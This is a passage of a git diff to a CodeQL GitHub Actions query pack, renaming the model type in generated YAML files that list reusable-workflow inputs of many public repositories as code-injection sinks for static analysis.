"input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9a..023666e67ffb 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb0..7005b7dd7c91 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3ac..8b73f89401a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c94..3cf43b814db7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd16..d33e308c7ebb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9e..5c1de93f08af 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec767..aab9fa502cb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c13..b58fff831e11 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf137..f96264fbf423 100644 
--- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a96..6aaf6aa27834 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e1..d246f4ce6444 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141d..a35a1a628e6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b53..ec22645570f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c1..e0eccb26a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e152..5f85bb1a91ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f638..7f1af3242605 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a6..b06b390e718f 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce87..d5746b566cc6 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a2780..fbe9e286d2b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d3100794..6ba2fc75375d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a5..6d522b776dcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c366..c210f350439a 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b629..81eeb82033cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d9..6d81f2ff242a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cffd..b7ea7250825c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c043360..972b6f15baa4 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c64..07f0c5c0f691 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e6..6bbf33e7f89a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ffb..165965dd568a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a5..3d1e182458e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index e3694a389735..689cc91871ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index f6f33154581e..0481c04cb671 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 34efc8414d89..8c0c944a3937 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 71866026ef91..8f4c44324088 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 83d241d21c0c..9406f7d299cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 3021de125684..36838ef4ddb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index d2cb1da1e9fd..8b16601e6c22 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c551a135a142..e8db2ff568de 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index f469f5de268d..208e444adebc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 7ec8dac3f7bb..41edf0b03737 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 4ce9252ce76c..faca7973f1f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index abb5b43c3276..76db6821c5e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 9e9da70e88ec..383a88ed0556 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 8de3f4c1ca4a..bcd3b09ed688 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml 
